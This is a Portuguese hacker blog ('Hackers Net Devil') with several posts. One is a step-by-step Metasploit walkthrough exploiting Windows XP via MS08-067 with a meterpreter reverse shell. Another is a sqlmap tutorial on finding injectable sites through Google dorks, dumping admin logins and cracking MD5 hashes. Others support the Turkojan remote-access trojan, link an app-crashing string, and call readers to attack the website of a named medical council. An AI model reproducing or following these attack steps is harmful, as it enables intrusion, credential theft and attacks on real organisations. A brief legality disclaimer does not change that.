www.hndsofts.com


 


online em Hackers Net Devil

Você é o visitante número

O código que paraliza a Apple

21:13 ---


Sim, é isso mesmo. Existe uma sequência de caracteres que quando é exibida em qualquer Aplicativo da apple, faz com que ele trave imediatamente. O Bug foi descoberto recentemente. Pode ser postado em redes sociais, etc...

Aqui está:


http://pastebin.com/raw.php?i=yvTAXCFD

E não se esqueça: The Zoera Never Ends!

O Algorítmo do CPF

19:42 ---



O CPF (Cadastro de Pessoas Físicas) tem um algrítmo que não é lá aquelas coisas, se é que você me entende :)
Com uma série de cálculos é possível gerar números válidos de CPF. É claro que existem programas que fazem estes cálculos, mas se você gosta de matemática e programação, eu criei em três linguagens diferentes, scripts que usam o algorítmo do CPF para gerar numeros válidos, todos eles pedem apenas 9 digitos (9 digitos qualqueres) para que sejam gerados os dois ultimos.

Aqui estão:

Delphi:





Java:




Batch (DOS):

16:45 ---

 

KALI LINUX

A nova versão do Backtrack

Todos, ou pelo menos a maioria das pessoas que se interessam pelo assunto hacking, já devem ter usado o Linux BackTrack.
Recentemente foi criado pela Offensive Security o Kali Linux, uma nova versão do Backtrack, voltada também para o Pentesting.
O Kali Linux é um sistema baseado em Debian. Ele é mais robusto e fácil de atualizar. É um sistema perfeito para rodar o tão conhecido Metasploit.

Você pode adquirir o Kali Linux aqui mesmo, no Hackers Net Devil.

Porta Turkojan 4

00:36 ---
Olá pessoal! Para quem usa o Turkojan 4, percebeu que em alguns casos a porta, mesmo depois de liberada, continua dando problema. Eu realmente não sei, deve ser algum bug no turkojan, mas apesar dele mostrar a porta com problema o programa ainda funciona normalmente.
Lembrem-se, qualquer dúvida contate-nos:

Skype: Failupload_0x7b
Face: www.fb.com/hackersnetdevil
E-mail: rafael.flip@hotmail.com
00:50 ---



Você tem um computador com Windows XP na sua rede interna? Ele pode estar vulnerável!
Sim, apesar de antiga esta falha ainda não foi corrigida. É uma falha no protocolo SMB que é responsável pelo compartilhamento de arquivos no Windows. Então se o computador com Windows XP tem algo compartilhado (tem por padão), ele tem grandes chances de estar vulnerável a uma invasão inevitável.


Como invadir?

Usaremos um exploit chamado Microsoft Server Service Relative Path Stack Corruption. Precisaremos ter o Metasploit (Download) instalado em nossa máquina.

Precisamos também verificar se a porta 445 está aberta. Para isso, vamos usar o NMAP (Download) com o seguinte comando:

Comando:

nmap -P0 -p 445 -O 192.168.1.103 Starting Nmap 6.25 ( http://nmap.org ) at 2013-08-02 00:30 E. South America Standard Time
Nmap scan report for 192.168.1.103
Host is up (0.00012s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
MAC Address: 08:00:27:8F:93:C2 (Cadmus Computer Systems)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Microsoft Windows XP
OS CPE: cpe:/o:microsoft:windows_xp::sp2 cpe:/o:microsoft:windows_xp::sp3
OS details: Microsoft Windows XP SP2 or SP3
Network Distance: 1 hop

OS detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 2.20 seconds

Veja que o NMAP nos informou que a porta 445 está aberta e que o sistema é Windows XP!

Agora, sabendo que o sistema pode ser vulnerável, precisamos fazer o ato da invasão.

No console do MetaSploit, vamos fazer o seguinte:

Comando:

use exploit/windows/smb/ms08_067_netapi

Agora devemos definir nosso alvo (Neste caso 192.168.1.103)

Comando:

set RHOST 192.168.1.103

Em seguida vamos definir o PAYLOAD e depois o nosso próprio IP (O meu é 192.168.1.104),  e depois simplesmente atacar!

Comando:

set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.104
exploit

 Lembre-se que este metodo só se aplica a máquinas na rede Local!
Isso nos dará total controle da máquina. Bom, veja o vídeo a baixo para mais detalhes!


17:07 ---

Fique Anônimo

Olá pessoal, venho apresentar a vocês o JAP (Java Anonymity Proxy). Ele é um gerenciador de Mixes de Proxys. Ou seja, sua conexão não fará mais a mesma trajetória até chegar à um site.
Bom, para quem não sabe o que é um Proxy, veja a imagem a baixo:





O Proxy age como um intermediário, desta forma, o site reconhecerá o IP do Proxy e não o seu.

Vamos lá, baixe o JAP aqui (Download) e baixe o Java (Download) caso você não tenha.
Depois de baixar e instalar o Java, precisamos configurar o JAP.

-Clique com o botão direito sobre o JAP, vá em Abrir Com, clique em Java.
-Aguarde alguns segundos até a interface do JAP ficar assim:


Bom, o JAP é um agente de Proxy Local, por isso precisamos configurar nosso computador para usar o JAP como Proxy.

-Va em painel de controle
- Rede e internet
- Opções de internet
-Conexões
- Configurações de LAN
-Deixe da seguinte forma

 

Clique em Ok, Ok.

Você está agora camuflado.

Pelo internet explorer, confira seu novo endereço de IP em http://meuip.datahouse.com.br

Para retirar o Proxy das configurações, basta entrar novamente no Painel de Controle e desmarcar a opção "Usar um servidor de proxy..."
05:50 ---

SQL INJECTION

Encontrando a vulnerabilidade e explorando

 Informações são bens preciosos dentro de empresas e sites. Elas estão presentes em banco de dados que organizam estas informações de forma que o sistema possa lê-las e repassa-las para o usuário.

 SQL (Structured Query Language/Linguagem de consulta estruturada) é a linguagem padrão para bancos de dados relacionais.

SQL Injection é o tipo de método que permite ao atacante inserir diversas instruções no código fonte SQL do site, permitindo assim o acesso as informações contidas no banco de dados.

É uma falha antiga, porém, diversos programadores cometem este erro hoje em dia.
Há formas de fazer SQL Injection manualmente, o que seria muito demorado, e por isso existem softwares que automatizam a tarefa de injetar o código malicioso.

O mais conhecido é o SQLMAP (Download), com ele é possível realizar o processo de forma 
rápida.

Instalação

-Você precisará do Python 2.7 (Download)
-Instale o Python no diretório padrão (C:\Python27)
-Precione    + PauseBreak e clique em "Alterar configurações"

-Vá até a guia "Avançado" e clique no botão "Variáveis de ambiente"
-Na parte de baixo (Variáveis do sistema), procure a variável "Path" e clique em "Editar"
-Coloque um sinal de ; (Ponto e vírgula) no final da variável e após o sinal de ; insira C:\Python27.
-Clique em Ok, Ok e Ok.
-Extraia o SQLMAP para qualquer pasta (Disco Local C: de preferência) 


Bom, agora com o SQLMAP instalado, precisamos definir nosso alvo.
Para procurar sites que usam SQL como linguagem para seus bancos de dados, faça o seguinte:

- Entre no Google
- Digite: inurl:".php?id="

Se quiser alvos mais específicos, coloque antes de .php, cadastro, login, usuarios ou algo do tipo. Para que fique mais ou menos assim: inurl:"cadastro.php?id="

Entre em algum site que aparecer nos resultados.
No final do URL do site, insira uma aspa simples. Por exemplo, se o endereço for:

http://www.teste.com/cadastro.php?id=42
Coloque:
http://www.teste.com/cadastro.php?id=42'

Se o site estiver vulnerável, ele te retornará um erro. Erros como estes:

 
 Isto já é meio caminho andado.
Agora precisamos explorar a falha usando o SQLMAP
Vou usar o site www.teste.com como exemplo, mas você use o site que encontrar vulnerável

-Abra seu Prompt de Comando (CMD)
-Navegue até a pasta onde extraiu o SQLMAP usando o comando CD. (Se extraiu no disco local C: faça o comando [cd C:\sqlmapproject-sqlmap-a639dbb]
-Dentro da pasta onde extraiu o SQLMAP, execute o seguinte comando:
python sqlmap.py -u www.teste.com/cadastro.php?id=1 --dbs
(Não se esqueça de trocar www.teste.com/cadastro.php?id=1 pelo URL do site vulnerável)
-O comando acima retornará os banco de dados do site desta forma:
 

-Execute o comando:
python sqlmap.py -u www.teste.com/cadastro.php?id=1 -D nome_do_banco_de_dados --tables
(No lugar de nome_do_banco_de_dados insira o nome do banco de dados que o comando anterior retornou)

-O comando acima deve retornar as tabelas existentes no banco de dados desta forma:
 

-Execute o comando:
python sqlmap.py -u www.teste.com/cadastro.php?id=1 -D nome_do_banco_de_dados -T nome_da_tabela --columns  
(No lugar de nome_da_tabela você deve inserir o nome de uma das tabelas retornadas pelo SQLMAP)

-O comando acima deve retornar as colunas da tabela que você escolheu, desta forma:
 

-Execute o seguinte comando:
python sqlmap.py -u www.teste.com/cadastro.php?id=1 -D nome_do_banco_de_dados -T nome_da_tabela -C login,senha --dump
 (No lugar de login,senha você deve colocar o nome das colunas que você escolher. Sendo separadas por vírgulas)

-O comando acima deve retornar os registros das colunas que você escolheu desta forma:
 

Estas informações deveriam ser propriedade somente do administrador do site. No caso acima, eu consegui usuário e senha do administrador do site, o que me permitiu alterar qualquer conteúdo do site.
No caso de senhas, muitas vezes vocês deverão encontrar senhas criptografadas por Hashes MD5. O próprio SQLMAP tem um Brute-Force que poderia quebrar a senha, mas isso pode levar muito tempo, neste caso use este site: http://md5decrypter.co.uk
Ele contém milhões destas Hashes já quebradas, quem sabe não pode te ajudar ;)

Lembre-se, o uso deste método para destruir sites ou vender informações É CRIME, então use somente para fins de teste ou para informar o administrador do site que existe esta falha.

Hackers Net Devil




Parece que o CRMPR não está salvando

22:59 ---


Recebemos informações de que CRMPR (Conselho Regional de Medicina do Paraná), está deixando hospitais com péssimo estado de consevação, deixando pacientes de lado, e isso tem cara de desvio de verba pública. Você, talvez não tenha passado por uma situação na qual desejaria morrer do que estar em hospitais como estes, talvez já tenha passado por esta situação. Mas incondicionalmente, eles precisam saber que não estamos de brincadeira, que pessoas não são lixo, e que já sabemos da grande sujeira.

A vontade galera, já sabem o que fazer: http://www.crmpr.org.br/

Postagens populares

Contato



rafael.flip@hotmail.com

failupload_0x7b

turkojan 4 vnc black bl4ck hacker hackers rafhack rafael.flip@hotmail.com hackers net devil hackersnd hackersnetdevil videos hackear msn derrubar site HOIC anonymous parceria hacker ultilitarios varios programas comandos ms dos ataque ddos como derrubar sites melhor site hacker ImagemPáginas Contato Blog Downloads Keylogger capturar teclas log software local machine run microsoft current hotspot shield camuflar IP não tenha medo participar ataque hacker governo 1clickdownload turkojan 4